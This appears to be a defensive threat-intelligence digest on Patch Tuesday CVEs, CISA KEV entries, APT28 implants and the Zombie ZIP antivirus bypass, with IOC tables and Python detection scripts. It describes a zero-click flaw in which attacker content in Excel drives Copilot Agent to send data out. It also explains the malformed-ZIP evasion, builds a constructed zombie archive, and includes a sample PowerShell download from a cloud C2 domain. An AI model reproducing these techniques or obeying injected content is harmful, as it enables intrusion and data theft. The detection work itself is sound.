1. Microsoft March 2026 Patch Tuesday — Copilot Exfil Zero-Click + 2 Public Zero-Days
Summary
Microsoft’s March 2026 Patch Tuesday lands with 83 CVEs (8 Critical, 75 Important) and one genuinely unusual entry: a zero-click information-disclosure bug in Excel that weaponizes Copilot Agent for unintended data exfiltration — no user interaction required. Alongside it, two publicly disclosed zero-days (SQL Server EoP and .NET DoS) arrived with full public disclosure but no confirmed in-wild exploitation. Most urgently for defenders: the two Critical Office RCE bugs (CVE-2026-26110, CVE-2026-26113) are exploitable via the preview pane.
What’s New (Last 24 Hours)
CVE-2026-26144 (Critical, CVSS 8.6): Excel information-disclosure flaw — exploits Copilot Agent mode to exfiltrate spreadsheet data via unintended network egress. Zero-click: attacker-controlled content in Excel can cause Copilot to beacon outbound without user action.
CVE-2026-21262 (Important, CVSS 8.8): SQL Server EoP — publicly disclosed zero-day, grants sysadmin privileges via improper access control over network. No exploitation confirmed, but public PoC basis exists from researcher disclosure (cross-DB chain article).
O365 exfil rules partially cover CVE-2026-26144 Copilot egress if Copilot beacons via O365 infrastructure; EoP detection covers post-exploitation from CVE-2026-21262 SQL sysadmin grant leading to OS-level escalation. Preview-pane RCE has no direct Splunk match — EDR process ancestry hunting is primary.
sqlps.exe rule catches post-CVE-2026-21262 LOLBin abuse in SQL Server context; no native Copilot exfil or Office preview-pane RCE rule — process ancestry rules required.
CISA added three vulnerabilities to the Known Exploited Vulnerabilities catalog on March 9. Two are well-documented exploitation targets (SolarWinds Web Help Desk deserialization, linked to Warlock ransomware; VMware Workspace One UEM SSRF, part of a coordinated multi-product SSRF campaign). The third — Ivanti EPM CVE-2026-1603 — is an auth bypass credential leak with over 700 internet-exposed instances tracked on Shadowserver, and active exploitation telemetry from IP 103.69.224[.]98. Ivanti has not confirmed exploitation but CISA has.
What’s New (Last 24 Hours)
CVE-2025-26399 (CVSS 9.8) — SolarWinds Web Help Desk AjaxProxy deserialization RCE added to KEV; Warlock ransomware crew attributed. FCEB deadline: March 12, 2026.
CVE-2026-1603 (CVSS 8.6) — Ivanti EPM authentication bypass credential leak. Exploitation telemetry: attacker IP 103.69.224[.]98. FCEB deadline: March 23, 2026.
CVE-2021-22054 (CVSS 7.5) — VMware/Omnissa Workspace One UEM SSRF, FCEB deadline: March 23, 2026.
Actionable Intel

| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
| --- | --- | --- | --- | --- |
| 103.69.224[.]98 | IOC (IP) | T1190 (Exploit Public-Facing Application) | Firewall/proxy logs, IDS | Block and alert on inbound connections from this IP to Ivanti EPM instances |
| HTTP POST to /AjaxProxy endpoint (SolarWinds WHD) | TTP | T1190 | Web/app server logs | Alert on POST requests to /AjaxProxy from unexpected IPs; baseline normal access patterns |
| Java deserialization payload in WHD request body (abnormal Content-Type: application/x-java-serialized-object) | TTP | T1059.007 (JavaScript/Java Exec) | Web app logs, WAF | WAF rule blocking Java deserialization Content-Types against WHD endpoints |
| Unauthenticated GET to Ivanti EPM credential endpoint (auth bypass path) | TTP | T1078 (Valid Accounts) | Web/app server logs | Alert on unauthenticated access patterns to EPM API endpoints returning credential data |
| SSRF outbound HTTP from Workspace One UEM server to internal IPs | TTP | T1090.002 (Proxy: External) | Firewall egress logs | Monitor WS1 UEM server for unexpected outbound HTTP to RFC-1918 addresses |
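The rows above can be run as a first-pass triage routine over web and egress log events. The Python below is an added example, not detection content from CISA or from SolarWinds, Ivanti or Omnissa: the event schema (dict keys), the host names, the admin baseline subnet and the sample events are constructed for the demonstration, and the attacker IP is the one from the KEV entry (defanged in the table, dotted here so it can be compared). The Ivanti EPM credential-endpoint row is left out because the page does not give the endpoint path.

```python
"""Triage constructed web/egress log events against the Actionable Intel rows.

Added example; schema, host names and baseline subnet are assumptions.
"""
import ipaddress

# IOC from the KEV entry (written defanged in the advisory table).
KEV_ATTACKER_IP = ipaddress.ip_address("103.69.224.98")

# RFC-1918 ranges, used for the WS1 UEM SSRF egress row.
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Assumed: the subnet from which WHD admins normally reach /AjaxProxy.
WHD_BASELINE_SOURCES = [ipaddress.ip_network("192.168.50.0/24")]

# Assumed host name of the Workspace One UEM server in egress logs.
WS1_UEM_HOSTS = {"ws1-uem-01"}

JAVA_SERIALIZED = "application/x-java-serialized-object"


def _in_any(ip, networks):
    return any(ip in net for net in networks)


def triage_event(ev):
    """Return the list of table rows an event matches (empty list = no match)."""
    hits = []
    src = ipaddress.ip_address(ev["src"])
    if src == KEV_ATTACKER_IP:
        hits.append("kev-ioc-ip")                       # row 1
    if ev.get("direction") == "inbound":
        path = ev.get("path", "")
        if (ev.get("method") == "POST" and path.startswith("/AjaxProxy")
                and not _in_any(src, WHD_BASELINE_SOURCES)):
            hits.append("whd-ajaxproxy-post-unbaselined")   # row 2
        if JAVA_SERIALIZED in ev.get("content_type", "").lower():
            hits.append("java-serialized-content-type")     # row 3
    elif ev.get("direction") == "outbound":
        dst = ipaddress.ip_address(ev["dst"])
        if ev.get("src_host") in WS1_UEM_HOSTS and _in_any(dst, RFC1918):
            hits.append("uem-egress-to-rfc1918")           # row 5
    return hits


def triage(events):
    """Map event id -> matched rows, keeping only events that matched something."""
    return {ev["id"]: hits for ev in events if (hits := triage_event(ev))}


# Constructed sample events (documentation-range addresses), not real logs.
SAMPLE_EVENTS = [
    {"id": "e1", "direction": "inbound", "src": "198.51.100.7", "dst_host": "whd-01",
     "method": "POST", "path": "/AjaxProxy", "content_type": JAVA_SERIALIZED},
    {"id": "e2", "direction": "inbound", "src": "192.168.50.12", "dst_host": "whd-01",
     "method": "POST", "path": "/AjaxProxy", "content_type": "application/x-www-form-urlencoded"},
    {"id": "e3", "direction": "inbound", "src": "103.69.224.98", "dst_host": "ivanti-epm-01",
     "method": "GET", "path": "/", "content_type": ""},
    {"id": "e4", "direction": "outbound", "src": "10.20.0.5", "src_host": "ws1-uem-01",
     "dst": "10.0.0.25"},
    {"id": "e5", "direction": "outbound", "src": "10.20.0.5", "src_host": "ws1-uem-01",
     "dst": "203.0.113.9"},
]

if __name__ == "__main__":
    for event_id, hits in triage(SAMPLE_EVENTS).items():
        print(event_id, hits)
```

Event e2 is deliberately a POST to /AjaxProxy from the baselined admin subnet and does not fire, which is the "baseline normal access patterns" half of row 2; swap the baseline list for your own source of truth before using this shape against production logs.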
Potential Detection Coverage Based on MITRE ATT&CK Technique

| Source | Detections | Coverage |
| --- | --- | --- |
| Splunk | None found for Ivanti EPM or WS1 UEM directly. Tomcat Session Deserialization Attempt is the closest for WHD deserialization, though it targets Tomcat sessions specifically. | Deserialization detection requires WAF or web log tuning specific to the SolarWinds WHD /AjaxProxy endpoint. Ivanti EPM and WS1 UEM have no direct Splunk ESCU rules. |
| | | Directly covers CVE-2025-26399 WHD exploitation — monitors for suspicious Java module loads or unexpected child processes spawned by the WHD process. Enable and tune this rule immediately. |
| Sigma | None found | No direct WHD, Ivanti EPM, or WS1 UEM Sigma rules in the current index. Network-based SSRF detection must be built from proxy/firewall egress baselines. |
3. APT28 (Sednit) — BEARDSHELL + COVENANT Dual-Implant Campaign Against Ukrainian Military
Summary
ESET published a new report detailing APT28’s active dual-implant espionage framework targeting Ukrainian military personnel since April 2024. The toolkit consists of three components: BEARDSHELL (PowerShell backdoor with Icedrive cloud C2), COVENANT (heavily-modified .NET post-exploitation framework now using Filen cloud storage for C2 since July 2025), and SLIMAGENT (keylogger/screenshotter/clipboard collector, descended from XAgent). The cloud C2 rotation strategy — pCloud → Koofr → Filen — is a deliberate defender evasion pattern. BEARDSHELL’s opaque-predicate obfuscation is a shared fingerprint with XTunnel from the 2016 DNC hack.
What’s New (Last 24 Hours)
ESET published full technical report “Sednit Reloaded: Back in the Trenches” — first public documentation of BEARDSHELL and the COVENANT/Filen C2 variant
PowerShell-over-hidden-window and obfuscation rules can surface BEARDSHELL’s cloud C2 calls if PowerShell ScriptBlock logging (Event 4104) is enabled. No BEARDSHELL-specific or Icedrive/Filen domain rule exists — add custom network IOC alert for cloud C2 domains.
High-entropy PowerShell detection can catch BEARDSHELL’s obfuscated dispatch commands. No COVENANT/Filen or SLIMAGENT-specific rules — keylogging HTML output pattern and cloud C2 domain rules must be added manually.
Direct match — Sigma has a dedicated COVENANT launcher detection rule. APT28’s modified COVENANT variant may partially bypass it (custom network protocol), but this is a strong starting point. Supplement with DLL-side masquerade detection for eapphost.dll/tcpiphlpsvc.dll.
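The coverage notes above lean on two signals from PowerShell ScriptBlock logging (Event ID 4104): high-entropy script text and calls to the cloud storage services used for C2. The Python below is an added example, not ESET's or any vendor's detection content. The 4104 events are constructed, the entropy threshold (5.0 bits per character) is an assumption to tune against your own telemetry, and the domains listed for Icedrive, Filen, Koofr and pCloud are assumed service domains that you should confirm against the report's IOCs and your own proxy logs.

```python
"""Score PowerShell 4104 ScriptBlock events for obfuscation entropy and cloud C2 domains.

Added example; threshold and domain list are assumptions, events are constructed.
"""
import base64
import math
from collections import Counter

ENTROPY_THRESHOLD = 5.0  # assumed; ordinary admin one-liners sit well below this

# Assumed domains for the storage services the report names as C2 hosts.
CLOUD_C2_DOMAINS = ("icedrive.net", "filen.io", "koofr.eu", "pcloud.com")


def shannon_entropy(text):
    """Bits per character over the character distribution of text."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def score_script_block(event):
    """Return indicator names for one event (empty list = nothing notable)."""
    if event.get("EventID") != 4104:
        return []
    text = event.get("ScriptBlockText", "")
    indicators = []
    if shannon_entropy(text) >= ENTROPY_THRESHOLD:
        indicators.append("high-entropy-scriptblock")
    lowered = text.lower()
    for domain in CLOUD_C2_DOMAINS:
        if domain in lowered:
            indicators.append(f"cloud-c2-domain:{domain}")
    return indicators


def triage_4104(events):
    """Map RecordId -> indicators for events that raised at least one."""
    return {ev["RecordId"]: hits for ev in events if (hits := score_script_block(ev))}


# Constructed events, not real telemetry. The base64 blob stands in for an
# encoded dispatch command; it is just the bytes 0..255 encoded.
_OBFUSCATED = base64.b64encode(bytes(range(256))).decode()
SAMPLE_4104 = [
    {"RecordId": 1, "EventID": 4104,
     "ScriptBlockText": "Get-Process | Sort-Object CPU -Descending"},
    {"RecordId": 2, "EventID": 4104,
     "ScriptBlockText": f"$d = [Convert]::FromBase64String('{_OBFUSCATED}')"},
    {"RecordId": 3, "EventID": 4104,
     "ScriptBlockText": "Invoke-WebRequest -Uri https://api.filen.io/ -OutFile c.bin"},
    {"RecordId": 4, "EventID": 4103, "ScriptBlockText": _OBFUSCATED},  # not a 4104, ignored
]

if __name__ == "__main__":
    for record_id, hits in triage_4104(SAMPLE_4104).items():
        print(record_id, hits)
```

Entropy alone will also fire on legitimate installers that embed encoded blobs, so in practice the two indicators are best combined with the process-ancestry context (hidden-window PowerShell) the coverage notes mention.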
4. Zombie ZIP — AV/EDR Bypass via Malformed Archive Headers (CVE-2026-0866)
Summary
Security researcher Chris Aziz (Bombadil Systems) published a PoC technique called “Zombie ZIP” that bypasses 50 out of 51 AV engines on VirusTotal by deliberately malforming ZIP headers. The trick: set Method=0 (STORED) in the ZIP header while the actual payload is DEFLATE-compressed. AV engines trust the header and scan raw bytes — seeing compressed noise with no signatures. A purpose-built loader ignores the declared method and decompresses as DEFLATE, recovering the payload perfectly. CERT/CC published advisory VU#976247 and assigned CVE-2026-0866. A public PoC with sample archives is live on GitHub. This is not a standalone exploit — it’s a delivery container that requires a secondary loader.
Configure SEG to quarantine ZIP attachments that fail extraction by standard tools (unsupported method error); add aggressive archive inspection mode
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
| --- | --- | --- | --- | --- |
| ZIP extraction tool returns “unsupported method” or CRC error on incoming attachment | Behavioral | T1566.001 (Spearphishing Attachment) | Email gateway logs | Alert on email attachment ZIP files that generate extraction errors at the gateway — these may be Zombie ZIPs |
| Custom loader process decompressing a ZIP file that standard tools cannot open | TTP | T1140 (Deobfuscate/Decode Files or Information) | EDR behavioral | Flag processes that open files that fail unzip/7-Zip validation; anomalous archive decompression from non-standard processes |
| Presence of zombie-zip PoC artifacts on disk | File | T1027.013 | EDR file creation | Hunt for files matching Zombie ZIP structure: ZIP magic bytes PK\x03\x04, Method=\x00\x00 (stored), payload fails standard extraction |
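The Summary and the last hunt row describe the structural tell: a local file header that declares Method=0 (STORED) over bytes that are not the stored plaintext. The Python below is an added example, not the researcher's PoC or any vendor's rule. It walks the local file headers of a ZIP and, for STORED entries, checks whether the raw bytes validate against the header CRC and whether they instead inflate as raw DEFLATE. The archives it scans are constructed in the block: two benign ones written by Python's zipfile module and one fixture that mirrors the advisory's description by patching the method field of a DEFLATE archive to STORED.

```python
"""Hunt for Zombie ZIP style header/payload mismatches in ZIP local file headers.

Added example; the fixtures are constructed and the indicator names are ours.
"""
import io
import struct
import zipfile
import zlib

LOCAL_HEADER_SIG = b"PK\x03\x04"
# Fixed 30-byte part: sig, version, flags, method, time, date, crc, csize, usize, name len, extra len
LOCAL_HEADER_FMT = "<4sHHHHHIIIHH"
LOCAL_HEADER_LEN = struct.calcsize(LOCAL_HEADER_FMT)
METHOD_STORED = 0


def iter_local_entries(data):
    """Yield a dict per local file header with its raw payload bytes."""
    pos = 0
    while (pos := data.find(LOCAL_HEADER_SIG, pos)) != -1:
        if pos + LOCAL_HEADER_LEN > len(data):
            return
        (_sig, _ver, flags, method, _mtime, _mdate, crc, csize, usize,
         name_len, extra_len) = struct.unpack_from(LOCAL_HEADER_FMT, data, pos)
        name_start = pos + LOCAL_HEADER_LEN
        payload_start = name_start + name_len + extra_len
        if flags & 0x08:
            # Sizes and CRC live in a trailing data descriptor; skipped in this example.
            pos = payload_start
            continue
        yield {
            "name": data[name_start:name_start + name_len].decode("utf-8", "replace"),
            "method": method, "crc": crc, "comp_size": csize, "uncomp_size": usize,
            "payload": data[payload_start:payload_start + csize],
        }
        pos = payload_start + csize


def check_entry(entry):
    """Indicators for one entry; only STORED entries are examined."""
    if entry["method"] != METHOD_STORED:
        return []
    payload = entry["payload"]
    indicators = []
    if (zlib.crc32(payload) & 0xFFFFFFFF) != entry["crc"]:
        indicators.append("stored-crc-mismatch")       # bytes are not the declared plaintext
    if entry["comp_size"] != entry["uncomp_size"]:
        indicators.append("stored-size-mismatch")      # a true STORED entry has equal sizes
    try:
        inflated = zlib.decompress(payload, -zlib.MAX_WBITS)   # raw DEFLATE, no zlib header
    except zlib.error:
        inflated = None
    if inflated is not None:
        indicators.append("raw-deflate-inflates")
        if (zlib.crc32(inflated) & 0xFFFFFFFF) == entry["crc"]:
            indicators.append("inflated-matches-header-crc")   # strongest signal
    return indicators


def scan_zip(data):
    """Map entry name -> indicators for entries that look like Zombie ZIP members."""
    return {e["name"]: ind for e in iter_local_entries(data) if (ind := check_entry(e))}


def _make_zip(name, payload, method):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(name, payload, compress_type=method)
    return buf.getvalue()


# Constructed fixtures, not samples from the public PoC.
SAMPLE_TEXT = b"quarterly report " * 64
BENIGN_STORED = _make_zip("report.txt", SAMPLE_TEXT, zipfile.ZIP_STORED)
BENIGN_DEFLATED = _make_zip("report.txt", SAMPLE_TEXT, zipfile.ZIP_DEFLATED)


def _constructed_zombie():
    """Header says STORED, bytes are DEFLATE: the method field sits at offset 8 of the first header."""
    data = bytearray(BENIGN_DEFLATED)
    struct.pack_into("<H", data, 8, METHOD_STORED)
    return bytes(data)


ZOMBIE = _constructed_zombie()

if __name__ == "__main__":
    for label, blob in (("benign-stored", BENIGN_STORED), ("benign-deflated", BENIGN_DEFLATED), ("zombie", ZOMBIE)):
        print(label, scan_zip(blob))
```

A plain CRC mismatch on a STORED entry also occurs with ordinary corruption, so the gateway or EDR rule should weight the combination: mismatched CRC plus a payload that inflates cleanly to bytes matching the declared CRC is the Zombie ZIP shape, not a broken download.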
Potential Detection Coverage Based on MITRE ATT&CK Technique

| Source | Detections | Coverage |
| --- | --- | --- |
| Splunk | None found | No Splunk ESCU rule addresses malformed ZIP/archive bypass evasion. Detection must be built at the email gateway and EDR behavioral layer — custom SPL hunting for processes opening files that fail standard decompression. |
| Elastic | None found with direct relevance | Masquerading rules cover filename-based evasion but not ZIP header malformation. A custom Elastic rule monitoring for archive extraction failures or anomalous decompression processes would be required. |
| Sigma | None found | No Sigma rule covers malformed archive header bypass. This is a detection gap; a new Sigma rule detecting ZIP Method=0 with compressed data (via file inspection tools or EDR telemetry) would fill it. |